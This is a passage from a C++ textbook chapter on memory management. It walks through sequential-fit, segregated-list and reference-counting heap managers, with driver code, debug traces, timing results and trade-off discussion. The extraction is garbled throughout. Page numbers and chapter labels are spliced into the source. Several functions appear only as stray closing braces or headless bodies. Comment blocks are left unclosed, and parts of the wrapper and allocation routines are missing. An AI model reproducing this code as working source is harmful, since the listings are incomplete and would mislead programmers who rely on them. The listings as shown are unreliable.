}/*end merge--------------------------------------------------*/
void SequentialFitMemoryManager::printState()
{
U4 i;
U4 current;
i=0;
current=START;
while(NEXT(current)!=0)
{
Chapter 4
printf("%lu) [P=%lu]",i,PREV(current));
printf("[addr=%lu]",current);
printf("[St=%s]",stateStr[STATE(current)]);
printf("[Sz=%lu]",SIZE(current));
printf("[N=%lu]\n",NEXT(current));
current = NEXT(current);
i++;
}
printf("%lu) [P=%lu]",i,PREV(current));
printf("[addr=%lu]",current);
printf("[St=%s]",stateStr[STATE(current)]);
printf("[Sz=%lu]",SIZE(current));
printf("[N=%lu]\n",NEXT(current));
return;
}/*end printState---------------------------------------------*/
260 Chapter 4
mallocV2.cpp
There were several minor alterations to this file, most notably the
presence of a different set of debugging macros. To activate debug-
ging code, uncomment the macros and compile a new build.
#include<stdio.h>
#include<stdlib.h>
#include<windows.h>
//#define DEBUG_SF_MEM_MGR
//#define DEBUG_MALLOCV2
#include<memmgr.cpp>
/*
wrapper functions
*/
SequentialFitMemoryManager *mmptr;
void closeMemMgr()
{
delete(mmptr);
}
#ifdef DEBUG_MALLOCV2
(*mmptr).printState();
#endif
return(ptr);
}
void newFree(void *ptr)
{
(*mmptr).release(ptr);
#ifdef DEBUG_MALLOCV2
(*mmptr).printState();
#endif
return;
}
Manual Memory Management 261
driver.cpp
As in the last example, this file contains the main() function defi-
nition that invokes the testing code. The debugTest() was
completely rewritten for this implementation. The Perfor-
manceTestDriver() function, defined in perform.cpp that
makes use of the PerformanceTest class, has been left
untouched.
#include<mallocV2.cpp>
#include<perform.cpp>
void debugTest()
{
void *ptr[6];
unsigned long allocs[6]={8,12,33,1,122,50};
int i;
initMemMgr(270);
for(i=0;i<6;i++)
{
ptr[i] = newMalloc(allocs[i]);
if(ptr[i]==NULL){ printf("ptr[%lu]==NULL!\n",i); }
}
printf("\n\nFREE MEMORY------------------------------\n\n");
Chapter 4
newFree(ptr[0]); //8
newFree(ptr[3]); //1
newFree(ptr[4]); //122
newFree(ptr[2]); //33
newFree(ptr[1]); //12
newFree(ptr[5]); //50
closeMemMgr();
return;
}/*end debugTest----------------------------------------------*/
void main()
{
//for the debug test, should activate debug macros in
mallocVx.cpp
//debugTest();
//for the performance test, should comment out debug macros
PerformanceTestDriver();
return;
}/*end main---------------------------------------------------*/
262 Chapter 4
Tests
If you look at the main() function defined in driver.cpp, you
will see that I performed both a debug test and a performance test. I
performed a debug test to make sure that the manager was doing
what it was supposed to do. If you modify my source code, I would
suggest running the debug test again to validate your changes. Once
I was sure that the memory manager was operational, I turned off
debugging features and ran a performance test.
The debug test is fairly simple, but at the same time, I would
take a good, hard look at what is going on. If you decide to run a
debug test, you will want to make sure that the DEBUG_XXX macros
in mallocV2.cpp are turned on. You will also want to comment
out the PerformanceTestDriver() function call in main().
The following output was generated by the debug build of the
memory manager:
SequentialFitMemoryManager::SequentialFitMemoryManager(270)
SequentialFitMemoryManager::allocate(8)
SequentialFitMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=FREE][Sz=236][N=0]
SequentialFitMemoryManager::allocate(12)
SequentialFitMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=FREE][Sz=211][N=0]
SequentialFitMemoryManager::allocate(33)
SequentialFitMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=FREE][Sz=165][N=0]
SequentialFitMemoryManager::allocate(1)
SequentialFitMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=OCCUPIED][Sz=1][N=119]
4) [P=105][addr=119][St=FREE][Sz=151][N=0]
SequentialFitMemoryManager::allocate(122)
SequentialFitMemoryManager::split(): split=YES
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=OCCUPIED][Sz=1][N=119]
4) [P=105][addr=119][St=OCCUPIED][Sz=122][N=254]
5) [P=119][addr=254][St=FREE][Sz=16][N=0]
SequentialFitMemoryManager::allocate(50)
Manual Memory Management 263
0) [P=0][addr=13][St=OCCUPIED][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=OCCUPIED][Sz=1][N=119]
4) [P=105][addr=119][St=OCCUPIED][Sz=122][N=254]
5) [P=119][addr=254][St=FREE][Sz=16][N=0]
ptr[5]==NULL!
FREE MEMORY-------------------------------------
SequentialFitMemoryManager::release(5439513)
SequentialFitMemoryManager::address resolves to index 13
0) [P=0][addr=13][St=FREE][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=OCCUPIED][Sz=1][N=119]
4) [P=105][addr=119][St=OCCUPIED][Sz=122][N=254]
5) [P=119][addr=254][St=FREE][Sz=16][N=0]
SequentialFitMemoryManager::release(5439605)
SequentialFitMemoryManager::address resolves to index 105
0) [P=0][addr=13][St=FREE][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=FREE][Sz=1][N=119]
4) [P=105][addr=119][St=OCCUPIED][Sz=122][N=254]
5) [P=119][addr=254][St=FREE][Sz=16][N=0]
SequentialFitMemoryManager::release(5439619)
Chapter 4
SequentialFitMemoryManager::address resolves to index 119
SequentialFitMemoryManager::merge():merging with both sides
0) [P=0][addr=13][St=FREE][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=OCCUPIED][Sz=33][N=105]
3) [P=59][addr=105][St=FREE][Sz=165][N=0]
SequentialFitMemoryManager::release(5439559)
SequentialFitMemoryManager::address resolves to index 59
SequentialFitMemoryManager::merge():merging to NEXT
0) [P=0][addr=13][St=FREE][Sz=8][N=34]
1) [P=13][addr=34][St=OCCUPIED][Sz=12][N=59]
2) [P=34][addr=59][St=FREE][Sz=211][N=0]
SequentialFitMemoryManager::release(5439534)
SequentialFitMemoryManager::address resolves to index 34
SequentialFitMemoryManager::merge():merging with both sides
0) [P=0][addr=13][St=FREE][Sz=257][N=0]
SequentialFitMemoryManager::release(): cannot release NULL
pointer
0) [P=0][addr=13][St=FREE][Sz=257][N=0]
SequentialFitMemoryManager::~SequentialFitMemoryManager()free
ram[270]
264 Chapter 4
Trade-Offs
The sequential fit approach solves many of the problems that
plagued the bitmapped approach by using an indexing scheme that
decreased redundant effort. Instead of manually sifting through each
bit in a bit map, we were able to use a series of pointers to find what
we needed much more quickly.
While the sequential fit technique did exhibit far better perfor-
mance than the bit map technique, we were only using a 270-byte
heap. For much larger heaps, such as a 15MB heap, the amount of
time needed to traverse a sequential linked list from beginning to
end can hurt performance. Thus, the sequential fit method is not
exactly a scalable solution.
In terms of choosing a memory block to allocate, I use what is
known as the first-fit policy, which is to say that my implementation
uses the first satisfactory block of memory that it finds. There are
other policies, like next-fit, best-fit, and worst-fit.
The first-fit policy tends to cause the blocks of memory at the
start of the linked list to splinter into a number of smaller blocks.
Given that the sequential fit algorithm traverses the list starting
from the beginning during an allocation, this can hurt execution
time.
The next-fit policy is like the first-fit policy, but the memory man-
ager keeps track of the position of the last allocation. When the next
allocation request is processed, the manager will start traversing
the linked list from the point of the last allocation. This is done in an
attempt to avoid re-traversing the beginning of the list.
The best-fit policy traverses the linked list of memory blocks and
uses the smallest possible block that will satisfy an allocation
request. The best-fit approach does not waste memory and
Manual Memory Management 265
Chapter 4
6,136-byte rows, where each row consists of eight different blocks
of memory. This is illustrated in Figure 4.12. The size of the first
element in each row is 16 bytes, and the size of the last element in
each row is 4,096 bytes.
Figure 4.12
266 Chapter 4
Because the list elements are fixed in size, and their positions are
known, we do not need the PREVIOUS, FREE, and SIZE header
fields that were used in the sequential fit scheme. However, we do
need the STATE header field. This causes every plot of real estate
in memory to be prefixed by a header that is a single byte in size.
Each 6,136-byte row of memory contains eight memory blocks
that increase in size (see Figure 4.13). Given that rows are stacked
on top of each other in memory, as displayed in Figure 4.12, to get
to the next element of a specific size, take the index of a given ele-
ment and add 6,136 to it.
Figure 4.13
Implementation
The implementation of the segregated memory manager closely
mirrors the implementation of the sequential fit manager:
Table 4.4
File Use
driver.cpp contains main(), is the scene of the crime
mallocV3.cpp newMalloc(), newFree() wrappers (3rd version)
perform.cpp implements the PerformanceTest class
memmgr.cpp implements the SegregatedMemoryManager class
The only files that I had to modify were the mallocV3.cpp file
and the memmgr.cpp file.
Manual Memory Management 267
memmgr.cpp
The majority of the real work is performed by the class defined in
this file. The SegregatedMemoryManager class takes care of
allocating heap storage from Windows and managing it. The alloca-
tion function uses a helper function to search through the free lists.
The release function does everything by itself.
#ifdef DEBUG_SL_MEM_MGR
#define MSG0(arg); printf(arg);
#define MSG1(arg1,arg2); printf(arg1,arg2);
#else
#define MSG0(arg);
#define MSG1(arg1,arg2);
#endif
/*
list element format
|0| |1 .. n|
[STATE][payload]
U1 ?
Chapter 4
*/
#define FREE 0
#define OCCUPIED 1
char *stateStr[3]={"FREE","OCCUPIED"};
class SegregatedMemoryManager
{
private:
268 Chapter 4
HANDLE handle;
U1 *ram; /*memory storage*/
U4 size; /*# bytes*/
U4 nrows; /*# of 6136 byte rows*/
public:
SegregatedMemoryManager(U4 nbytes);
~SegregatedMemoryManager();
void*allocate(U4 nbytes);
void release(void* addr);
void printState();
};
SegregatedMemoryManager::SegregatedMemoryManager(U4 nbytes)
{
handle = GetProcessHeap();
if(handle==NULL)
{
printf("SegregatedMemoryManager::");
printf("SegregatedMemoryManager():");
printf("invalid handle\n");
exit(1);
}
ram = (U1*)HeapAlloc(handle,HEAP_ZERO_MEMORY,nbytes);
size = nbytes;
if(size<SZ_ROW)
{
printf("SegregatedMemoryManager::");
printf("SegregatedMemoryManager():");
printf("not enough memory fed to constructor\n");
exit(1);
}
nrows = size/SZ_ROW;
initColumn(START16);
initColumn(START32);
initColumn(START64);
Manual Memory Management 269
initColumn(START128);
initColumn(START256);
initColumn(START512);
initColumn(START1024);
initColumn(START4096);
MSG0("SegregatedMemoryManager::");
MSG1("SegregatedMemoryManager(%lu)\n",nbytes);
return;
}/*end constructor--------------------------------------------*/
}/*end initColumn---------------------------------------------*/
SegregatedMemoryManager::~SegregatedMemoryManager()
{
if(HeapFree(handle,HEAP_NO_SERIALIZE,ram)==0)
Chapter 4
{
printf("SegregatedMemoryManager::");
printf("~SegregatedMemoryManager():");
printf("could not free heap storage\n");
return;
}
MSG0("SegregatedMemoryManager::");
MSG0("~SegregatedFitMemoryManager()");
MSG1("free ram[%lu]\n",size);
return;
}/*end destructor---------------------------------------------*/
/*
U4 nbytes - number of bytes required
returns address of first byte of memory region allocated
( or NULL if cannot allocate a large enough block )
*/
270 Chapter 4
MSG0("SegregatedMemoryManager::");
MSG1("allocate(%lu)\n",nbytes);
if(nbytes==0)
{
MSG0("SegregatedMemoryManager::");
MSG0("allocate(): zero bytes requested\n");
return(NULL);
}
if(nbytes<=16)
{
index = searchColumn(START16);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START32);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START64);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START128);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START256);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START512);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START1024);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
else if(nbytes<=32)
{
index = searchColumn(START32);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START64);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START128);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START256);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START512);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START1024);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
else if(nbytes<=64)
Manual Memory Management 271
{
index = searchColumn(START64);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START128);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START256);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START512);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START1024);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
else if(nbytes<=128)
{
index = searchColumn(START128);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START256);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START512);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START1024);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
else if(nbytes<=256)
Chapter 4
{
index = searchColumn(START256);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START512);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START1024);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
else if(nbytes<=512)
{
index = searchColumn(START512);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START1024);
if(index){ return((void*)&ram[index]); }
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
else if(nbytes<=1024)
{
index = searchColumn(START1024);
if(index){ return((void*)&ram[index]); }
272 Chapter 4
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
else if(nbytes<=4096)
{
index = searchColumn(START4096);
if(index){ return((void*)&ram[index]); }
}
return(NULL);
}/*end allocation---------------------------------------------*/
/*
search a given size range for a free element
return index
or zero if no available memory
*/
U4 SegregatedMemoryManager::searchColumn(U4 index)
{
U4 i;
for(i=0;i<nrows;i++)
{
if(STATE(index)==FREE)
{
MSG0("SegregatedMemoryManager::");
MSG1("searchColumn(): free at index %lu, ",index);
MSG1("address=%p\n",&ram[index]);
STATE(index)=OCCUPIED;
return(index);
}
index = index + SZ_ROW;
}
return(0);
}/*end searchColumn-------------------------------------------*/
if(addr==NULL)
{
MSG0("SegregatedMemoryManager::");
MSG0("release(): cannot release NULL pointer\n");
return;
}
MSG0("SegregatedMemoryManager::");
MSG1("release(%p)\n",addr);
Manual Memory Management 273
MSG0("SegregatedMemoryManager::");
MSG1("address resolves to index %lu\n",free);
if(free==0)
{
MSG0("SegregatedMemoryManager::");
MSG0("release(): address in first 1st byte\n");
return;
}
Chapter 4
if(STATE(free)!=OCCUPIED)
{
MSG0("SegregatedMemoryManager::");
MSG0("release(): referencing invalid region\n");
return;
}
STATE(free)=FREE;
return;
}/*end release------------------------------------------------*/
void SegregatedMemoryManager::printState()
{
printf("[16 bytes]");
printColumn(START16);
printf("[32 bytes]");
printColumn(START32);
printf("[64 bytes]");
printColumn(START64);
274 Chapter 4
printf("[128 bytes]");
printColumn(START128);
printf("[256 bytes]");
printColumn(START256);
printf("[512 bytes]");
printColumn(START512);
printf("[1024 bytes]");
printColumn(START1024);
printf("[4096 bytes]");
printColumn(START4096);
return;
}/*end printState---------------------------------------------*/
}/*end printColumn--------------------------------------------*/
mallocV3.cpp
There were several minor alterations to this file, most notably the
presence of a different set of debugging macros. To activate debug-
ging code, uncomment the macros and compile a new build.
#include<stdio.h>
#include<stdlib.h>
#include<windows.h>
//#define DEBUG_SL_MEM_MGR
//#define DEBUG_MALLOCV3
#include<memmgr.cpp>
Manual Memory Management 275
/*
wrapper functions
*/
SegregatedMemoryManager *mmptr;
void closeMemMgr()
{
delete(mmptr);
}
#ifdef DEBUG_MALLOCV3
(*mmptr).printState();
#endif
return(ptr);
}
Chapter 4
{
(*mmptr).release(ptr);
#ifdef DEBUG_MALLOCV3
(*mmptr).printState();
#endif
return;
}
Tests
If you look at the main() function defined in driver.cpp, you
will see that I performed both a debug test and a performance test. I
performed a debug test to make sure the manager was doing what it
was supposed to do. If you modify my source code, I would suggest
running the debug test again to validate your changes. Once I was
sure that the memory manager was operational, I turned off debug-
ging features and ran a performance test.
The debug test is fairly simple, but at the same time, I would
take a good, hard look at what is going on. If you decide to run a
276 Chapter 4
debug test, you will want to make sure that the DEBUG_XXX macros
in mallocV3.cpp are turned on. You will also want to comment
out the PerformanceTestDriver() function call in main().
The following output was generated by the debug build of the
memory manager:
SegregatedMemoryManager::SegregatedMemoryManager(1048576)
SegregatedMemoryManager::allocate(8)
SegregatedMemoryManager::searchColumn(): free at index 1,
address=00B8000D
[16 bytes][00B8000D]
[32 bytes]
[64 bytes]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::allocate(12)
SegregatedMemoryManager::searchColumn(): free at index 6137,
address=00B81805
[16 bytes][00B8000D] [00B81805]
[32 bytes]
[64 bytes]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::allocate(33)
SegregatedMemoryManager::searchColumn(): free at index 51,
address=00B8003F
[16 bytes][00B8000D] [00B81805]
[32 bytes]
[64 bytes][00B8003F]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::allocate(1)
SegregatedMemoryManager::searchColumn(): free at index 12273,
address=00B82FFD
[16 bytes][00B8000D] [00B81805] [00B82FFD]
[32 bytes]
[64 bytes][00B8003F]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
Manual Memory Management 277
[4096 bytes]
SegregatedMemoryManager::allocate(122)
SegregatedMemoryManager::searchColumn(): free at index 116,
address=00B80080
[16 bytes][00B8000D] [00B81805] [00B82FFD]
[32 bytes]
[64 bytes][00B8003F]
[128 bytes][00B80080]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::allocate(50)
SegregatedMemoryManager::searchColumn(): free at index 6187,
address=00B81837
[16 bytes][00B8000D] [00B81805] [00B82FFD]
[32 bytes]
[64 bytes][00B8003F] [00B81837]
[128 bytes][00B80080]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
FREE MEMORY-------------------------------------
SegregatedMemoryManager::release(00B8000D)
SegregatedMemoryManager::address resolves to index 1
Chapter 4
[16 bytes][00B81805] [00B82FFD]
[32 bytes]
[64 bytes][00B8003F] [00B81837]
[128 bytes][00B80080]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::release(00B82FFD)
SegregatedMemoryManager::address resolves to index 12273
[16 bytes][00B81805]
[32 bytes]
[64 bytes][00B8003F] [00B81837]
[128 bytes][00B80080]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::release(00B80080)
SegregatedMemoryManager::address resolves to index 116
[16 bytes][00B81805]
[32 bytes]
[64 bytes][00B8003F] [00B81837]
278 Chapter 4
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::release(00B8003F)
SegregatedMemoryManager::address resolves to index 51
[16 bytes][00B81805]
[32 bytes]
[64 bytes][00B81837]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::release(00B81805)
SegregatedMemoryManager::address resolves to index 6137
[16 bytes]
[32 bytes]
[64 bytes][00B81837]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::release(00B81837)
SegregatedMemoryManager::address resolves to index 6187
[16 bytes]
[32 bytes]
[64 bytes]
[128 bytes]
[256 bytes]
[512 bytes]
[1024 bytes]
[4096 bytes]
SegregatedMemoryManager::~SegregatedFitMemoryManager()free
ram[1048576]
Although it may seem a tad tedious, it will help you tremendously to
read the debugTest() function and then step through the previ-
ous output. It will give you an insight into what the code is doing
and how the particulars are implemented.
The performance test was conducted by commenting out
debugTest() and the debug macros in mallocV3.cpp, and
then enabling the PerformanceTestDriver() function. The
results of the performance run were:
PerformanceTest::runTest(): time whistle blown
PerformanceTest::runTest(): race has ended
msecs=5
Manual Memory Management 279
Trade-Offs
Compared to the sequential fit technique, the segregated list imple-
mentation is blazing fast. However, this does not come without a
cost. The segregated list approach demands a large initial down pay-
ment of memory. The fact that only certain block sizes are provided
can also lead to severe internal fragmentation. For example, a
1,024-byte block could end up being used to service a 32-byte
request.
Another issue resulting from fixed block sizes is that there is a
distinct ceiling placed on the size of the memory region that can be
allocated. In my implementation, you cannot allocate a block larger
than 4,096 bytes. If, for some reason, you need a 4,097-byte block of
memory, you are plain out of luck. There are variations of my segre-
gated list approach, such as the buddy system, that allow certain
forms of splitting and merging to deal with this size-limit problem.
Performance Comparison
Let us revisit all three of the previous implementations. In each of
the performance tests, the resident memory manager was given
1MB of storage and was asked to service 1,024 consecutive mem-
ory allocation/release operations. The score card is provided in
Chapter 4
Table 4.5.
Table 4.5
Manager Milliseconds
bitmapped 856
sequential fit 35
segregated list 5
Automatic Memory
Management
Automatic memory managers keep track of the memory that is allo-
cated from the heap so that the programmer is absolved of the
responsibility. This makes life easier for the programmer. In fact,
not only does it make the programmer’s job easier, but it also elimi-
nates other nasty problems, like memory leaks and dangling
pointers. The downside is that automatic memory managers are
much more difficult to build because they must incorporate all the
extra bookkeeping functionality.
281
282 Chapter 5
Figure 5.1
void main()
{
char *cptr1;
char *cptr2;
char *cptr3;
return;
}
Each reference increment and decrement has been marked with a
comment to give you an idea of what would need to be done behind
the scenes.
The one line:
cptr2 = cptr3;
Implementation
I decided to implement a reference counting garbage collector by
modifying the sequential fit implementation in Chapter 4. As with
the sequential fit approach, memory is arranged as a series of blocks
where each block is prefixed by a 16-byte header (see Figure 5.2).
Figure 5.2
Automatic Memory Management 285
The STATE field, which was a byte in the sequential fit implementa-
tion, has been replaced by a 32-bit field called COUNT. This COUNT
field keeps track of the number of references to a block of memory.
My implementation of the reference counting memory manager
required four files:
Table 5.1
File Use
driver.cpp contains main(), is the scene of the crime
mallocV4.cpp newMalloc(), newFree() wrappers (4th version)
perform.cpp implements the PerformanceTest class
memmgr.cpp implements the RefCountMemoryManager class
driver.cpp
This file contains the main() entry point. You can build my imple-
mentation to execute a diagnostic test or a performance test. To
build the diagnostic version, you will need to comment out the
PerformanceTestDriver() invocation and uncomment the
debugTest() invocation. You will also need to activate the
DEBUG_XXX macros in the mallocV4.cpp file.
Because the compiler that I used has not been engineered to
emit the extra instructions needed to support reference counting, I
had to manually insert the code. Throughout debugTest(), I
added inc() and dec() function calls. I also added comments
indicating that these calls should have been generated by the
compiler.
#include<mallocV4.cpp>
#include<perform.cpp>
/*
not using a modified compiler, so will need to insert
Chapter 5
void debugTest()
{
void *ptr[6];
void *ptr1;
void *ptr2;
void *ptr3;
initMemMgr(270);
286 Chapter 5
for(i=0;i<6;i++)
{
ptr[i] = newMalloc(allocs[i]);
if(ptr[i]==NULL){ printf("ptr[%lu]==NULL!\n",i); }
}
//copying addresses
printf("copying ptr[0]\n");
ptr1 = ptr[0];
(*mmptr).inc(ptr[0]); //compiler insert
printf("copying ptr[1]\n");
ptr3 = ptr[1];
(*mmptr).inc(ptr[1]); //compiler insert
printf("copying ptr1\n");
ptr2 = ptr1;
(*mmptr).inc(ptr1); //compiler insert
//overwritting
printf("leaving scope\n");
for(i=0;i<6;i++)
{
(*mmptr).dec(ptr[i]); //compiler insert
}
(*mmptr).dec(ptr1); //compiler insert
(*mmptr).dec(ptr2); //compiler insert
(*mmptr).dec(ptr3); //compiler insert
closeMemMgr();
return;
}/*end debugTest----------------------------------------------*/
void main()
{
//for the debug test, should activate debug macros in
mallocVx.cpp
//debugTest();
PerformanceTestDriver();
return;
}/*end main---------------------------------------------------*/
mallocV4.cpp
Because we are now in the domain of automatic memory manage-
ment, I disabled the newFree() function that has traditionally
been defined in this file. The newMalloc() function is still opera-
tional, albeit using a different underlying object. If you wish to
perform a debug/diagnostic test, you will need to activate the
DEBUG_XXX macros.
#include<stdio.h>
#include<stdlib.h>
#include<windows.h>
//#define DEBUG_RC_MEM_MGR
//#define DEBUG_MALLOCV4
#include<memmgr.cpp>
/*
wrapper functions
*/
RefCountMemoryManager *mmptr;
void closeMemMgr()
{
Chapter 5
delete(mmptr);
}
#ifdef DEBUG_MALLOCV4
(*mmptr).printState();
#endif
return(ptr);
}
288 Chapter 5
perform.cpp
The PerformanceTest class defined in this file has not been
modified very much. The only thing that changed was the imple-
mentation of the runTest() member function. Specifically, I had
to remove the calls to newFree(), which are no longer valid, and
add in the dec() invocations that the compiler should normally
emit.
unsigned long PerformanceTest::runTest()
{
unsigned long *allocs;
unsigned long i;
unsigned long ticks1,ticks2;
getAllocArray(allocs);
initMemMgr(1024*1024);
Automatic Memory Management 289
ticks1 = GetTickCount();
for(i=0;i<nAllocations;i++)
{
//printf("%lu\n",allocs[i]);
addr[i] = (char *)newMalloc(allocs[i]);
if(addr[i]==NULL)
{
printf("mallco()=addr[%lu]=%lu failed\n",i,addr[i]);
exit(1);
}
}
ticks2 = GetTickCount();
closeMemMgr();
free(addr);
free(allocs);
return(ticks2-ticks1);
}/*end runTest------------------------------------------------*/
memmgr.cpp
The RefCountMemoryManager class defined in this file is
Chapter 5
Figure 5.3
#ifdef DEBUG_RC_MEM_MGR
#define MSG0(arg); printf(arg);
#define MSG1(arg1,arg2); printf(arg1,arg2);
#else
#define MSG0(arg);
#define MSG1(arg1,arg2);
#endif
/*
list element format
|0 3||4 7||8 11||12 15||16 .. n|
[PREV][NEXT][COUNT][ SIZE ][payload]
U4 U4 U4 U4 ?
class RefCountMemoryManager
{
private:
HANDLE handle;
U1 *ram; /*memory storage*/
U4 size;
public:
RefCountMemoryManager(U4 nbytes);
~RefCountMemoryManager();
void*allocate(U4 nbytes);
void inc(void *addr);
void dec(void *addr);
void printState();
};
RefCountMemoryManager::RefCountMemoryManager(U4 nbytes)
{
handle = GetProcessHeap();
if(handle==NULL)
{
printf("RefCountMemoryManager::");
printf("RefCountMemoryManager():");
printf("invalid handle\n");
Chapter 5
exit(1);
}
ram = (U1*)HeapAlloc(handle,HEAP_ZERO_MEMORY,nbytes);
size = nbytes;
if(size<=SZ_HEADER)
{
printf("RefCountMemoryManager::");
printf("RefCountMemoryManager():");
printf("not enough memory fed to constructor\n");
292 Chapter 5
exit(1);
}
PREV(START)=0;
NEXT(START)=0;
COUNT(START)=0;
SIZE(START)=size-SZ_HEADER;
MSG0("RefCountMemoryManager::");
MSG1("RefCountMemoryManager(%lu)\n",nbytes);
return;
}/*end constructor--------------------------------------------*/
RefCountMemoryManager::~RefCountMemoryManager()
{
if(HeapFree(handle,HEAP_NO_SERIALIZE,ram)==0)
{
printf("RefCountMemoryManager::");
printf("~RefCountMemoryManager():");
printf("could not free heap storage\n");
return;
}
MSG0("RefCountMemoryManager::");
MSG0("~RefCountMemoryManager()");
MSG1("free ram[%lu]\n",size);
return;
}/*end destructor---------------------------------------------*/
/*
U4 nbytes - number of bytes required
returns address of first byte of memory region allocated
( or NULL if cannot allocate a large enough block )
*/
MSG0("RefCountMemoryManager::");
MSG1("allocate(%lu)\n",nbytes);
if(nbytes==0)
{
MSG0("RefCountMemoryManager::");
Automatic Memory Management 293
current = START;
while(NEXT(current)!=0)
{
if((SIZE(current)>=nbytes)&&(COUNT(current)==FREE))
{
split(current,nbytes);
return((void*)&ram[current]);
}
current = NEXT(current);
}
if((SIZE(current)>=nbytes)&&(COUNT(current)==FREE))
{
split(current,nbytes);
return((void*)&ram[current]);
}
return(NULL);
}/*end allocation---------------------------------------------*/
/*
breaks [free] region into [alloc][free] pair, if possible
*/
if(SIZE(addr)>= nbytes+SZ_HEADER+SZ_HEADER)
{
U4 oldnext;
U4 oldprev;
U4 oldsize;
U4 newaddr;
MSG0("RefCountMemoryManager::");
294 Chapter 5
MSG0("split(): split=YES\n");
oldnext=NEXT(addr);
oldprev=PREV(addr);
oldsize=SIZE(addr);
NEXT(addr)=newaddr;
PREV(addr)=oldprev;
COUNT(addr)=1;
SIZE(addr)=nbytes;
NEXT(newaddr)=oldnext;
PREV(newaddr)=addr;
COUNT(newaddr)=FREE;
SIZE(newaddr)=oldsize-nbytes-SZ_HEADER;
}
else
{
MSG0("RefCountMemoryManager::");
MSG0("split(): split=NO\n");
COUNT(addr)=1;
}
return;
}/*end split--------------------------------------------------*/
MSG0("RefCountMemoryManager::");
MSG1("checkAddress(%lu)\n",addr);
return(TRUE);
Automatic Memory Management 295
}/*end checkAddress-------------------------------------------*/
if(free<SZ_HEADER)
{
MSG0("RefCountMemoryManager::");
MSG0("checkIndex(): address in first 16 bytes\n");
return(FALSE);
}
return(TRUE);
}/*end checkIndex---------------------------------------------*/
if(checkAddress(addr)==FALSE){ return; }
Chapter 5
if(checkIndex(free)==FALSE){ return; }
COUNT(free) = COUNT(free)+1;
MSG0("RefCountMemoryManager::");
MSG1("inc(): incrementing ram[%lu] ",free);
MSG1("to %lu\n",COUNT(free));
return;
296 Chapter 5
}/*end inc----------------------------------------------------*/
if(checkAddress(addr)==FALSE){ return; }
MSG0("RefCountMemoryManager::");
MSG1("dec(): address resolves to index %lu\n",free);
if(checkIndex(free)==FALSE){ return; }
